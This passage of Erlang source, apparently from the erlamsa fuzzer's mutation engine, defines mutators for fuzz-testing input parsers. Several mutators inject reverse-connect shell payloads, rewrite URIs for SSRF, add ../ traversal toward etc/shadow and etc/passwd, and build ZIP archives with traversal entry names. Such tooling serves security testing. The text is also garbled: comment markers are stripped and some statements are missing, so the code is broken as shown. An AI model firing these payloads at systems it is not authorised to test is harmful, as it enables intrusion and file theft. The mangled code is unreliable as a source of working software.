8 -> 65535;
9 -> 65536;
_Else -> erlamsa_rnd:rand(1024)
end.
-spec push_as(non_neg_integer(), list()) -> list().
push_as(0, Tail)
-> Tail;
push_as(N, Tail) ->
push_as(N - 1, [97 | Tail]).
-spec insert_traversal(char()) -> list().
insert_traversal(Symb) ->
[Symb | lists:flatten(lists:map(fun (_) -> [$., $., Symb] end, lists:seq(1, erlamsa_rnd:erand(10))))].
-spec mutate_text_data(string(), [text_mutators()]) -> string().
mutate_text_data(Lst, TxtMutators) ->
mutate_text(erlamsa_rnd:rand_elem(TxtMutators), Lst).
-spec buildrevconnect() -> string().
buildrevconnect() ->
Inj = erlamsa_rnd:rand_elem(shellinjects()),
Rev = erlamsa_rnd:rand_elem(revconnects()),
{IP, Port} = get_ssrf_ep(),
lists:flatten(io_lib:format(Inj, [io_lib:format(Rev, [IP, Port])])).
-spec mutate_text(text_mutators(), string()) -> string().
mutate_text(insert_badness, Lst) ->
in erlang lists starts from 1
Bad = random_badness(),
TODO : check before or after E , in radamsa Bad + + [ X ] ,
mutate_text(replace_badness, Lst) ->
in erlang lists starts from 1
Bad = random_badness(),
lists:sublist(Lst, P - 1) ++ overwrite(lists:nthtail(P, Lst), Bad);
mutate_text(insert_aaas, Lst) ->
N = rand_as_count(),
in erlang lists starts from 1
lists:sublist(Lst, P - 1) ++ push_as(N, lists:nthtail(P, Lst));
mutate_text(insert_traversal, Lst) ->
in erlang lists starts from 1
lists:sublist(Lst, P - 1)
++ insert_traversal(erlamsa_rnd:rand_elem(["\\", "/"]))
++ lists:nthtail(P, Lst);
mutate_text(insert_null, Lst) ->
Lst ++ [0];
insert
mutate_text(insert_delimeter, Lst) ->
in erlang lists starts from 1
Bad = erlamsa_rnd:rand_elem(delimeters()),
mutate_text(insert_shellinj, Lst) ->
in erlang lists starts from 1
ShellInj = buildrevconnect(),
erlamsa_utils:applynth(P, Lst, fun(E, R) -> ShellInj ++ [E|R] end).
Generic ASCII Bad mutation
In Radamsa , this function will work only if Cs started as string
-spec string_generic_mutate(chunk_list(), [text_mutators()], non_neg_integer(), non_neg_integer()) -> chunk_list().
string_generic_mutate(Cs, _, L, R) when R > L/4 -> Cs;
string_generic_mutate(Cs, TxtMutators, L, R) ->
in erlang , list is beginning from index 1
El = lists:nth(P, Cs),
case El of
{text, Bs} ->
Data = mutate_text_data(Bs, TxtMutators),
{byte, _Bs} ->
string_generic_mutate(Cs, TxtMutators, L, R + 1);
{delimited, Left, Bs, Right} ->
erlamsa_utils:applynth(P, Cs, fun (_E, Rest) -> [{delimited, Left, mutate_text_data(Bs, TxtMutators), Right}] ++ Rest end)
end.
-spec construct_ascii_mutator(fun(), atom()) -> mutation_fun().
construct_ascii_mutator(Fun, Name) ->
fun Ascii_mutator (Ll = [H|T], Meta) ->
Data = binary_to_list(H),
Cs = erlamsa_strlex:lex(Data),
in radamsa stringy_length
Ms = Fun(Cs),
D = erlamsa_rnd:rand_delta(),
BinData = list_to_binary(erlamsa_strlex:unlex(Ms)),
{Ascii_mutator,
[BinData | T],
[{Name, D}|Meta], D};
not a string at all ( even 1 node ) , skipping
{Ascii_mutator, Ll, Meta, -1}
end
end.
-spec construct_ascii_bad_mutator() -> mutation_fun().
construct_ascii_bad_mutator() ->
construct_ascii_mutator(
fun (Cs) -> string_generic_mutate(Cs,
[insert_badness, replace_badness, insert_traversal, insert_aaas, insert_null],
length(Cs), 0)
end,
ascii_bad).
-spec drop_delimeter(non_neg_integer(), chunk()) -> chunk().
drop one(both ) or zero delimeters
{text, [Left|Bs]};
{text, Bs ++ [Right]} ;
{text, Bs};
El.
-spec string_delimeter_mutate(chunk_list(), non_neg_integer(), non_neg_integer()) -> chunk_list().
string_delimeter_mutate(Cs, L, R) when R > L/4 -> Cs;
string_delimeter_mutate(Cs, L, R) ->
in erlang , list is beginning from index 1
El = lists:nth(P, Cs),
case El of
Data = mutate_text_data(Bs, [erlamsa_rnd:rand_elem(
[
insert_delimeter, insert_delimeter,
insert_delimeter, insert_shellinj
])
]),
string_delimeter_mutate(Cs, L, R + 1);
{delimited, _Left, _Bs, _Right} ->
Drop = drop_delimeter(erlamsa_rnd:rand(4), El),
erlamsa_utils:applynth(P, Cs, fun(_E, Rest) -> [Drop|Rest] end)
end.
-spec construct_ascii_delimeter_mutator() -> mutation_fun().
construct_ascii_delimeter_mutator() ->
construct_ascii_mutator(
fun (Cs) -> string_delimeter_mutate(Cs, length(Cs), 0)
end,
ascii_delimeter).
-spec base64_mutator(list_of_bins(), meta_list()) -> mutation_res().
base64_mutator([H|T], Meta) ->
Data = binary_to_list(H),
Cs = erlamsa_strlex:lex(Data),
MutasList = mutas_list(erlamsa_mutations:mutations([])),
{Ms, {NewD, NewMeta}} = lists:mapfoldl(
fun
({text, A}, Acc = {DAcc, MAcc}) when length(A) > 6 ->
try base64:decode(A) of
Bin ->
D = erlamsa_rnd:rand_delta(),
Muta = mutators_mutator(MutasList, []),
{_, NewLl, AddedMeta} = Muta([Bin], []),
NewBin = erlang:iolist_to_binary(NewLl),
{
{text, base64:encode_to_string(NewBin)},
{DAcc + D, [AddedMeta, {base64_mutator, D} | MAcc]}
}
catch
error:badarg ->
{{text, A}, Acc};
error:function_clause ->
{{text, A}, Acc};
_:_ ->
{{text, A}, Acc}
end;
(Lex, Acc) -> {Lex, Acc}
end,
{-1, Meta}, Cs),
BinData = list_to_binary(erlamsa_strlex:unlex(Ms)),
{fun base64_mutator/2, [BinData | T], NewMeta, NewD}.
-spec get_ssrf_ep() -> {string(), integer()}.
get_ssrf_ep() ->
try get_ssrf_ep_unsafe() of
{SSRFHost, SSRFPort} -> {SSRFHost, SSRFPort}
catch
_:_ -> {"localhost", 51234}
end.
-spec get_ssrf_ep_unsafe() -> {string(), integer()}.
get_ssrf_ep_unsafe() ->
SSRFPort = case ets:match(global_config, {cm_port, '$1'}) of
[[Port]] -> Port;
_ -> 51234
end,
SSRFSystemHost = case ets:match(global_config, {cm_host, '$1'}) of
[[SHost]] -> SHost;
_ -> {}
end,
SSRFUserHost = case ets:match(global_config, {cm_host_user, '$1'}) of
[[UHost]] -> UHost;
_ -> {}
end,
SSRFHost = case {SSRFSystemHost, SSRFUserHost} of
{{}, {}} -> "localhost";
{SSRFSystemHost, {}} -> inet:ntoa(SSRFSystemHost);
{_, SSRFUserHost} -> SSRFUserHost;
_ -> "localhost"
end,
{SSRFHost, SSRFPort}.
-spec get_ssrf_uri() -> list().
get_ssrf_uri() ->
{SSRFHost, SSRFPort} = get_ssrf_ep(),
io_lib:format("://~s:~p/", [SSRFHost, SSRFPort]).
-spec change_scheme(list()) -> list().
change_scheme([$e, $l, $i, $f | T]) -> lists:reverse([$p, $t, $t, $h | T]);
change_scheme(Lst) -> lists:reverse(Lst).
-spec rand_uri_mutate(string(), string(), integer()) -> {string(), integer(), list()}.
rand_uri_mutate(T, Acc, 1) ->
{change_scheme(Acc) ++ get_ssrf_uri() ++ T, 1, {uri, success}};
rand_uri_mutate(T, Acc, 2) ->
{SSRFHost, SSRFPort} = get_ssrf_ep(),
AtAddr = lists:flatten(io_lib:format(erlamsa_rnd:rand_elem([" @~s:~p", "@~s:~p"]),
[SSRFHost, SSRFPort])
),
[Domain | Query] = string:tokens(T, "/"),
Modified = lists:flatten([change_scheme(Acc), "://", Domain, AtAddr, $/, string:join(Query,"/")]),
{Modified, 1, {uri, success}};
rand_uri_mutate(T, Acc, 3) ->
[Domain | Query] = string:tokens(T, "/"),
Traversals = ["/" | lists:map(fun (_) -> "../" end, lists:seq(1, erlamsa_rnd:erand(10)))],
NewQuery = Traversals ++ case erlamsa_rnd:erand(4) of
1 -> string:join(Query, "/");
2 -> "Windows/win.ini";
3 -> "etc/shadow";
4 -> "etc/passwd"
end,
{lists:reverse(Acc) ++ "://" ++ Domain ++ lists:flatten(NewQuery), 1, {uri, success}}.
-spec try_uri_mutate(list()) -> {list(), integer(), list()}.
try_uri_mutate(Lst) -> try_uri_mutate(Lst, []).
-spec try_uri_mutate(list(), list()) -> {list(), integer(), list()}.
try_uri_mutate([ $:, $/, $/ | T], Acc) ->
rand_uri_mutate(T, Acc, erlamsa_rnd:erand(3));
try_uri_mutate([], Acc) -> {lists:reverse(Acc), 0, []};
try_uri_mutate([H|T], Acc) ->
try_uri_mutate(T, [H|Acc]).
-spec uri_mutator(list_of_bins(), meta_list()) -> mutation_res().
uri_mutator([H|T], Meta) ->
Cs = erlamsa_strlex:lex(binary_to_list(H)),
{Ms, {NewD, NewMeta}} = lists:mapfoldl(
fun
({text, A}, {DAcc, MAcc}) when length(A) > 5 ->
{NewA, NewD, NewMeta} = try_uri_mutate(A),
{{text, NewA}, {DAcc + NewD, [NewMeta | MAcc]}};
(Lex, Acc) -> {Lex, Acc}
end,
{-1, Meta}, Cs),
BinData = list_to_binary(erlamsa_strlex:unlex(Ms)),
{fun base64_mutator/2, [BinData | T], NewMeta, NewD}.
-spec usual_delims(non_neg_integer()) -> non_neg_integer() | false.
usual_delims(_) -> false.
-spec grow(list(), byte(), list()) -> {list(), list() | false}.
- > lst # false = ran out of data trying to parse up to close , but lst is the same with partial parsing
- > lst tail - lst = did successfully parse up to close . ready node is lst , tail is following data
{lists:reverse(Rout), false};
{lists:reverse([Close | Rout]), T};
grow([H|T], Close, Rout) ->
Next_close = usual_delims(H),
case Next_close of
add one byte to this node
grow(T, Close, [H | Rout]);
_Else ->
{This, Lst} = grow(T, Next_close, []),
Lst =:= false ->
{lists:reverse(Rout) ++ [H | This], false};
true ->
grow(Lst, Close, [[H | This] | Rout])
end
end.
count_nodes(T , count_nodes(H , N+1 ) ) ;
-spec sublists(list()) -> list().
lst - > a list of lists ( not counting tails ) in lst , when walked recursively , not counting lst itself
sublists(Lst) -> sublists(Lst, []).
-spec sublists(list(), list()) -> list().
sublists([], Found) -> Found;
sublists([H|T], Found) when is_list(H) ->
sublists(T, sublists(H, [H|Found]));
sublists([_H|T], Found) ->
sublists(T, Found).
-spec pick_sublist(list()) -> list().
pick_sublist(Lst) ->
Subs = sublists(Lst),
case Subs of
[] -> false;
_Else ->
erlamsa_rnd:rand_elem(Subs)
end.
-spec edit_sublist(list(), list(), fun()) -> list().
edit_sublist(Lst, Sub, Op) ->
lists:reverse(edit_sublist(Lst, Sub, Op, [])).
-spec edit_sublist(list(), list(), fun(), list()) -> list().
edit_sublist(Lst = [H|_T], Sub, Op, Acc) when H =:= Sub ->
[Op(Lst)|Acc];
edit_sublist([H|T], Sub, Op, Acc) ->
NewH = edit_sublist(H, Sub, Op),
edit_sublist(T, Sub, Op, [NewH|Acc]);
edit_sublist(Lst, _Sub, _Op, Acc) ->
[Lst|Acc].
-spec edit_sublists(list(), gb_trees:tree()) -> list().
lst ( ff of node - > ( node - > node ) ) - > lst ' ; < - could also be done with a recursive - mapn
edit_sublists([Hd|T], OpFF) when is_list(Hd) ->
MaybeOp = erlamsa_utils:get(Hd, false, OpFF),
case MaybeOp of
false ->
[edit_sublists(Hd, OpFF) | edit_sublists(T, OpFF)];
_ ->
[MaybeOp(Hd) | edit_sublists(T, OpFF)]
end;
edit_sublists([H|T], OpFF) ->
[H | edit_sublists(T, OpFF)];
edit_sublists(Lst, _) -> Lst.
-spec partial_parse(list()) -> list().
partial_parse(Lst) -> partial_parse(Lst, []).
-spec partial_parse(list(), list()) -> list().
partial_parse([], Rout) ->
lists:reverse(Rout);
partial_parse([H|T], Rout) ->
CloseP = usual_delims(H),
case CloseP of
false ->
partial_parse(T, [H | Rout]);
_ ->
{This, Lst} = grow(T, CloseP, []),
case Lst of
false ->
lists:reverse(Rout) ++ [H|This];
_ ->
partial_parse(Lst, [[H|This] | Rout])
end
end.
-spec sed_tree_op(fun(), atom()) -> mutation_fun().
sed_tree_op(Op, Name) ->
fun F (Ll = [H|T], Meta) ->
case erlamsa_utils:binarish(H) of
true -> {F, Ll, Meta, -1};
false ->
NewMeta = [{Name, 1} | Meta],
Lst = partial_parse(binary_to_list(H)),
NewLst = edit_sublist(Lst, Sub, Op),
{F, [erlang:iolist_to_binary(NewLst) | T], NewMeta, 1}
end
end.
-spec sed_tree_dup() -> mutation_fun().
sed_tree_dup() ->
sed_tree_op(fun (Node = [H|_T]) -> [H|Node] end, tree_dup).
-spec sed_tree_del() -> mutation_fun().
sed_tree_del() ->
sed_tree_op(fun ([_H|T]) -> T end, tree_del).
-spec sed_tree_swap_one(list(), list()) -> list().
overwrite one node with one of the others
sed_tree_swap_one(Lst, Subs) ->
ToSwap = erlamsa_rnd:reservoir_sample(Subs, 2),
[A | [B | _]] = erlamsa_rnd:random_permutation(ToSwap),
edit_sublist(Lst, A, fun ([_|Tl]) -> [B | Tl] end).
-spec sed_tree_swap_two(list(), list()) -> list().
pairwise swap of two nodes
TODO : here there is a bug ( also in original radamsa ) that causes to swap child with the parent node , could be feature xD
sed_tree_swap_two(Lst, Subs) ->
ToSwap = erlamsa_rnd:reservoir_sample(Subs, 2),
[A | [B | _]] = ToSwap,
Mapping = gb_trees:enter(B, fun(_X) -> A end, gb_trees:enter(A, fun (_X) -> B end, gb_trees:empty())),
edit_sublists(Lst, Mapping).
-spec construct_sed_tree_swap(fun(), atom()) -> mutation_fun().
construct_sed_tree_swap(Op, Name) ->
fun F (Ll = [H|T], Meta) ->
case erlamsa_utils:binarish(H) of
true -> {F, Ll, Meta, -1};
false ->
Lst = partial_parse(binary_to_list(H)),
Subs = sublists(Lst),
N = length(Subs),
case N < 2 of
true -> {F, Ll, Meta, -1};
false ->
NewLst = Op(Lst, Subs),
{F, [erlang:iolist_to_binary(NewLst) | T], [{Name, 1} | Meta], 1}
end
end
end.
-spec repeat_path(list(), list(), non_neg_integer()) -> list().
repeat_path(Parent, _Child, N) when N < 2 ->
< - causes at least 1 extra path to be made , saves one useless replace cycle
repeat_path(Parent, Child, N) ->
case erlang:process_info(self(), memory) of
{memory, Mem} when Mem > 256000000 ->
Parent;
_Else ->
edit_sublist(Parent, Child,
fun ([_H|T]) -> [repeat_path(Parent, Child, N-1) | T] end)
end.
-spec choose_child(list()) -> false | list().
choose_child(Node) ->
Subs = sublists(Node),
case Subs of
[] -> false;
_Else -> erlamsa_rnd:rand_elem(Subs)
end.
-spec choose_stutr_nodes(list()) -> {false | list(), false | list()}.
choose_stutr_nodes([H|T]) ->
Childp = choose_child(H),
case Childp of
false -> choose_stutr_nodes(T);
_Else -> {H, Childp}
end.
-spec sed_tree_stutter(list_of_bins(), meta_list()) -> mutation_res().
sed_tree_stutter(Ll = [H|T], Meta) ->
case erlamsa_utils:binarish(H) of
true -> {fun sed_tree_stutter/2, Ll, Meta, -1};
false ->
Subs = sublists(Lst),
RandSubs = erlamsa_rnd:random_permutation(Subs),
{Parent, Child} = choose_stutr_nodes(RandSubs),
N_reps = erlamsa_rnd:rand_log(10),
case Parent of
false -> {fun sed_tree_stutter/2, Ll, Meta, -1};
_Else ->
NewLst = edit_sublist(Lst, Child,
fun ([_H|Tl]) -> [repeat_path(Parent, Child, N_reps)|Tl] end),
{fun sed_tree_stutter/2,
[erlang:iolist_to_binary(NewLst) | T],
[{tree_stutter, 1} | Meta], 1}
end
end.
UTF-8
grab low 6 bits of a number
-spec ext(integer()) -> integer().
ext(N) ->
(N band 2#111111) bor 2#10000000.
-spec encode_point(integer()) -> [integer()].
encode an ascii to utf-8
ascii , fits 7 bits
[Point];
5 + 6 bits
[16#c0 bor (16#1f band (Point bsr 6)),
ext(Point)];
4 + 2 * 6 bits
[16#e0 bor (16#0f band (Point bsr 12)),
ext(Point bsr 6),
ext(Point)];
3 + 3 * 6 bits
[16#f0 bor (2#111 band (Point bsr 18)),
ext(Point bsr 12),
ext(Point bsr 6),
ext(Point)].
-spec funny_unicode() -> list().
funny_unicode() ->
65535
65536
utf16
[43,47,118,57],[43,47,118,43],[43,47,118,47],
[247,100,76],[221,115,102,115],[14,254,255],[251,238,40],
[251,238,40,255],[132,49,149,51]],
Codes = [[16#0009,16#000d],16#008D, 16#00a0,16#1680,16#180e,
[16#2000,16#200a],16#2028,16#2029,16#202f,16#205f,
16#3000,[16#200e,16#200f],[16#202a,16#202e],
[16#200c,16#200d],16#0345,16#00b7,[16#02d0,16#02d1],
16#ff70,[16#02b0,16#02b8],16#fdd0,16#034f,
[16#115f,16#1160],[16#2065,16#2069],16#3164,16#ffa0,
16#e0001,[16#e0020,16#e007f],
[16#0e40,16#0e44],16#1f4a9],
Numbers = lists:foldl(
fun
([X,Y], Acc) -> lists:seq(X,Y) ++ Acc;
(X, Acc) -> [X|Acc]
end, [], Codes),
Manual ++ [encode_point(X) || X <- Numbers].
-spec sed_utf8_widen(list_of_bins(), meta_list()) -> mutation_res().
sed_utf8_widen([H|T], Meta) ->
P = erlamsa_rnd:rand(size(H)),
D = erlamsa_rnd:rand_delta(),
{fun sed_utf8_widen/2,
[edit_byte_vector(H, P,
fun (B) when B =:= B band 2#111111 -> N = B bor 2#10000000, <<2#11000000:8, N:8>>;
(B) -> <<B:8>>
end)
| T], [{sed_utf8_widen, D}|Meta], D}.
-spec sed_utf8_insert(list_of_bins(), meta_list()) -> mutation_res().
sed_utf8_insert([H|T], Meta) ->
P = erlamsa_rnd:rand(size(H)),
D = erlamsa_rnd:rand_delta(),
Bin = list_to_binary(erlamsa_rnd:rand_elem(funny_unicode())),
{fun sed_utf8_insert/2,
[edit_byte_vector(H, P,
fun (B) -> <<B:8, Bin/binary>> end)
| T], [{sed_utf8_insert, D}|Meta], D}.
-spec nomutation(list_of_bins(), meta_list()) -> mutation_res().
nomutation(Ll, Meta) ->
{fun nomutation/2, Ll, [{nomutation, -1}|Meta], -1}.
mutate_length(Binary, []) -> {-2, Binary};
mutate_length(Binary, _Elem = {ok, Size, Endianness, Len, A, _B}) ->
Am8 = A * 8, Len8 = Len * 8,
{H, Len, Blob, Rest} = erlamsa_field_predict:extract_blob(Endianness, Binary, Am8, Size, Len8),
<<TmpNewLen:Size>> = erlamsa_rnd:random_block(trunc(Size/8)),
NewLen = min(?ABSMAX_BINARY_BLOCK, TmpNewLen*2),
Result =
case erlamsa_rnd:rand(7) of
0 -> <<H:Am8, 0:Size, Blob:Len8, Rest/binary>>;
set len field = 0xFF .. FF
1 -> <<H:Am8, -1:Size, Blob:Len8, Rest/binary>>;
2 ->
RndBlock = erlamsa_rnd:fast_pseudorandom_block(NewLen),
TmpBin = erlamsa_field_predict:rebuild_blob(Endianness, H, Am8, Len, Size, Blob, Len8, RndBlock),
<<TmpBin/binary, Rest/binary>>;
3 ->
erlamsa_field_predict:rebuild_blob(Endianness, H, Am8, NewLen, Size, 0, 0, Rest);
_Else ->
erlamsa_field_predict:rebuild_blob(Endianness, H, Am8, NewLen, Size, Blob, Len8, Rest)
end,
{+1, Result}.
-spec length_predict(list_of_bins(), meta_list()) -> mutation_res().
length_predict([H|T], Meta) ->
Elem = erlamsa_rnd:rand_elem(erlamsa_field_predict:get_possible_simple_lens(H)),
{D, Bin} = mutate_length(H, Elem),
{fun length_predict/2, [Bin|T], [{muta_len, D}|Meta], D}.
mutate_zip_path(FileName, I, B, Acc) ->
R = erlamsa_rnd:rand(20),
NewFileName = lists:flatten([ "../" || _A <- lists:seq(1,R)] ++ FileName),
[{NewFileName, B(), I()} | Acc].
-spec zip_path_traversal(list_of_bins(), meta_list()) -> mutation_res().
zip_path_traversal([H|T], Meta) ->
Name = "inmemory.zip",
case zip:foldl(fun mutate_zip_path/4, [], {Name, H}) of
{ok, FileSpec} ->
{ok, {Name, Bin}} = zip:create(Name, lists:reverse(FileSpec), [memory]),
{fun zip_path_traversal/2, [Bin|T], [{muta_zippath, +1}|Meta], +1};
_Else ->
{fun zip_path_traversal/2, [H|T], [{muta_zippath, -1}|Meta], -1}
end.
Basic type mutations ( for fuzzing record - related ( e.g. protobuf , ASN.1 , etc ) data
-spec basic_mutate_binary(binary()) -> binary().
basic_mutate_binary(Binary) ->
Muta = erlamsa_mutations:mutators_mutator(erlamsa_mutations:inner_mutations(default)),
{_NewMuta, NewLstBin, _Meta} = Muta([Binary], []),
hd(NewLstBin).
-spec basic_mutate_list(list()) -> list().
basic_mutate_list(Lst) -> basic_mutate_list(Lst, erlamsa_rnd:rand(12)).
-spec basic_mutate_list(list(), 0..12) -> list().
erlamsa_rnd:random_permutation(Lst);
erlamsa_generic:list_del(Lst, length(Lst));
erlamsa_generic:list_del_seq(Lst, length(Lst));
swap two elements
erlamsa_generic:list_dup(Lst, length(Lst));
swap two elements
erlamsa_generic:list_repeat(Lst, length(Lst));
swap two elements
erlamsa_generic:list_clone(Lst, length(Lst));
swap two elements
erlamsa_generic:list_swap(Lst, length(Lst));
basic_mutate_list([], _) -> [];
R = erlamsa_rnd:erand(length(Lst)),
erlamsa_utils:applynth(R, Lst, fun basic_type_mutation/1).
-spec basic_mutate_string(list()) -> list().
basic_mutate_string(Str) ->
L = length(Str),
Asciis = lists:foldl(fun (A, Acc) when A>31,A<127 -> Acc+1; (_,Acc) -> Acc end, 0, Str),
if
Asciis / L >= 0.8 -> binary_to_list(basic_mutate_binary(list_to_binary(Str)));
true -> basic_mutate_list(Str)
end.
-spec basic_type_mutation(any(), float()) -> any().
basic_type_mutation(El, Prob) -> basic_type_mutation(El, erlamsa_rnd:rand_float(), Prob).
-spec basic_type_mutation(any(), float(), float()) -> any().
basic_type_mutation(El, Rnd, Prob) when Rnd >= Prob -> El;
basic_type_mutation(El, _Rnd, _Prob) -> basic_type_mutation(El).
-spec basic_type_mutation(any()) -> any().
basic_type_mutation(true) -> false;
basic_type_mutation(false) -> true;
basic_type_mutation(El = [H|_]) when is_list(El), is_integer(H) =/= true -> basic_mutate_list(El);
basic_type_mutation(El) when is_list(El) -> basic_mutate_string(El);
basic_type_mutation(El) when is_binary(El) -> basic_mutate_binary(El);
basic_type_mutation(El) when is_integer(El) -> mutate_num(El);
basic_type_mutation(El) when is_float(El) -> mutate_float(El);
basic_type_mutation(El) -> El.
-spec adjust_priority(non_neg_integer(), non_neg_integer()) -> non_neg_integer().
adjust_priority(Pri, 0) -> Pri;
adjust_priority(Pri, Delta) ->
max(?MIN_SCORE, min(?MAX_SCORE, Pri + Delta)).
-spec weighted_permutations([mutation()]) -> [mutation()].
weighted_permutations([]) -> [];
weighted_permutations(Pris) ->
PPris = lists:map(fun (X = {S, P, _, _}) -> {erlamsa_rnd:rand(trunc(S*P)), X} end, Pris),
SPPris = lists:sort(fun ({A,_},{B,_}) -> A>=B end, PPris),
[ X || {_, X} <- SPPris].
Mutators have a score they can change themselves ( 1 - 100 ) and a priority given by
-spec mux_fuzzers([mutation()]) -> fun().
( # ( score priority name ) ... ) - > merged - mutafn : : rs ll meta - > merged - mutafn ' rs ' ll ' meta '
mux_fuzzers(Fs) ->
fun
L([], Meta) -> {mux_fuzzers(Fs), <<>>, Meta};
L(Ll, Meta) when is_list(Ll) ->
mux_fuzzers_loop(Ll, weighted_permutations(Fs), [], Meta);
end.
-spec mux_fuzzers_loop(lazy_list_of_bins(), [mutation()], [mutation()], meta_list()) -> {fun(), lazy_list_of_bins(), meta_list()}.
mux_fuzzers_loop(Ll, [], Out, Meta) -> {mux_fuzzers(Out), Ll, Meta};
mux_fuzzers_loop(Ll = [H|_T], [_Node|Tail], Out, Meta) when is_binary(H), byte_size(H) > ?ABSMAX_BINARY_BLOCK ->
{mux_fuzzers(Out ++ Tail), Ll, [{skipped_big, byte_size(H)} | Meta]};
mux_fuzzers_loop(Ll, [Node|Tail], Out, Meta) ->
{Mscore, MPri, Fn, Mname} = Node,
Res = Fn(Ll, Meta),
in radamsa ( mfn rs mll mmeta delta ) = Fn ( ... ) , that strange , TODO : check it
in radamsa mfn instead of fn
IsMll = is_list(Mll),
if
IsMll andalso (hd(Mll) == hd(Ll)) -> mux_fuzzers_loop(Ll, Tail, NOut, [{failed, Mname} | MMeta]);
true -> {mux_fuzzers(NOut ++ Tail), Mll, [{used, Mname} | MMeta]}
end.
-spec mutations() -> [mutation()].
mutations() ->
mutations([]).
-spec mutations([mutation()]) -> [mutation()].
mutations(CustomMutas) ->
[{?MAX_SCORE, 10, fun erlamsa_sgml:sgml_mutate/2, sgm, "SGML tree mutations"},
{?MAX_SCORE, 3, fun erlamsa_json:json_mutate/2, js, "JSON tree mutations"},
{?MAX_SCORE, 1, fun sed_utf8_widen/2, uw, "try to make a code point too wide"},
{?MAX_SCORE, 2, fun sed_utf8_insert/2, ui, "insert funny unicode"},
{?MAX_SCORE, 1, construct_ascii_bad_mutator(), ab, "enhance silly issues in ASCII string data handling"},
{?MAX_SCORE, 1, construct_ascii_delimeter_mutator(), ad, "play with delimeters in ASCII string data"},
{?MAX_SCORE, 1, sed_tree_dup(), tr2, "duplicate a node"},
{?MAX_SCORE, 1, sed_tree_del(), td, "delete a node"},
{?MAX_SCORE, 3, fun sed_num/2, num, "try to modify a textual number"},
{?MAX_SCORE, 2, construct_sed_tree_swap(fun sed_tree_swap_one/2, tree_swap_one), ts1, "swap one node with another one"},
{?MAX_SCORE, 2, fun sed_tree_stutter/2, tr, "repeat a path of the parse tree"},
{?MAX_SCORE, 2, construct_sed_tree_swap(fun sed_tree_swap_two/2, tree_swap_two), ts2, "swap two nodes pairwise"},
{?MAX_SCORE, 1, construct_sed_byte_drop(), bd, "drop a byte"},
{?MAX_SCORE, 1, construct_sed_byte_inc(), bei, "increment a byte by one"},
{?MAX_SCORE, 1, construct_sed_byte_dec(), bed, "decrement a byte by one"},
{?MAX_SCORE, 1, construct_sed_byte_flip(), bf, "flip one bit"},
{?MAX_SCORE, 1, construct_sed_byte_insert(), bi, "insert a byte"},
{?MAX_SCORE, 1, construct_sed_byte_random(), ber, "swap a byte with random one"},
{?MAX_SCORE, 1, construct_sed_byte_repeat(), br, "repeat a byte"},
{?MAX_SCORE, 1, construct_sed_bytes_perm(), sp, "permute a sequence of bytes"},
{?MAX_SCORE, 1, construct_sed_bytes_repeat(), sr, "repeat a sequence of bytes"},
{?MAX_SCORE, 1, construct_sed_bytes_drop(), sd, "delete a sequence of bytes"},
{?MAX_SCORE, 1, construct_sed_bytes_randmask([fun mask_nand/1, fun mask_or/1, fun mask_xor/1]), snand, "NAND/OR/XOR random bytes from block with 2^random values"},
{?MAX_SCORE, 1, construct_sed_bytes_randmask([fun mask_replace/1]), srnd, "replace random bytes from block with random values"},
{?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_del/2, line_del), ld, "delete a line"},
{?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_del_seq/2, line_del_seq), lds, "delete many lines"},
{?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_dup/2, line_dup), lr2, "duplicate a line"},
{?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_clone/2, line_clone), lri, "copy a line closeby"},
{?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_repeat/2, line_repeat), lr, "repeat a line"},
{?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_swap/2, line_swap), ls, "swap two lines"},
{?MAX_SCORE, 1, construct_line_muta(fun erlamsa_generic:list_perm/2, line_perm), lp, "swap order of lines"},
{?MAX_SCORE, 1, construct_st_line_muta(fun erlamsa_generic:st_list_ins/2, list_ins, [0]), lis, "insert a line from elsewhere"},
{?MAX_SCORE, 1, construct_st_line_muta(fun erlamsa_generic:st_list_replace/2, list_replace, [0]), lrs, "replace a line with one from elsewhere"},
{?MAX_SCORE, 2, fun sed_fuse_this/2, ft, "jump to a similar position in block"},
{?MAX_SCORE, 1, fun sed_fuse_next/2, fn, "likely clone data between similar positions"},
{?MAX_SCORE, 2, fun sed_fuse_old/2, fo, "fuse previously seen data elsewhere"},
{?MAX_SCORE, 2, fun length_predict/2, len, "predicted length mutation"},
{?MAX_SCORE, 7, fun base64_mutator/2, b64, "try mutate base64-encoded block"},
{?MAX_SCORE, 1, fun uri_mutator/2, uri, "try mutate URI to cause SSRF"},
{?MAX_SCORE, 1, fun zip_path_traversal/2, zip, "ZIP path traversal"},
{?MAX_SCORE, 0, fun nomutation/2, nil, "no mutation will occur (debugging purposes)"}
|CustomMutas].
{ Max_Score , Pri , F , Name , Desc } - > { Score , , F , Name }
-spec mutas_list(list()) -> [mutation()].
mutas_list(Lst) ->
lists:map(fun({Score, Pri, F, Name, _Desc}) -> {Score, Pri, F, Name} end, Lst).
-spec inner_mutations_list(atom()) -> [atom()].
inner_mutations_list(sgml) -> [ab, ad, bd, b64, ld, lp, lri, lr, num, sd, uri, json];
inner_mutations_list(json) -> [ab, ad, b64, num, sd, sp, sr, uri, sgm];
inner_mutations_list(_) -> [ab, ad, ber, b64, ld, lp, lri, lr, num, sd, srnd, sxor, uri, zip].
-spec inner_mutations(atom()) -> [mutation()].
inner_mutations(Case) ->
InnerMutationsMap = maps:from_list(lists:map(fun (A) -> {A, ok} end, inner_mutations_list(Case))),
lists:foldl(
fun({Sc, Pri, Fun, Name, _Desc}, Acc) ->
case maps:get(Name, InnerMutationsMap, no) of
ok -> [{Sc, Pri, Fun, Name}|Acc];
no -> Acc
end
end,
[], mutations([])).
-spec default(list()) -> [{atom(), non_neg_integer()}].
default(CustomMutas) -> [{Name, Pri} || {_, Pri, _, Name, _Desc} <- mutations(CustomMutas)].
-spec tostring(list()) -> string().
tostring(Lst) ->
lists:foldl(fun ({_, Pri, _, Name, _Desc}, Acc) ->
case Pri of
1 -> atom_to_list(Name) ++ "," ++ Acc;
_Else -> atom_to_list(Name) ++ "=" ++ integer_to_list(Pri) ++ "," ++ Acc
end
end, [], Lst).
-spec make_mutator([{atom(), non_neg_integer()}], list()) -> fun().
make_mutator(Lst, CustomMutas) ->
SelectedMutas = maps:from_list(Lst),
Mutas = lists:foldl(
fun ({Score, _Pri, F, Name, _Desc}, Acc) ->
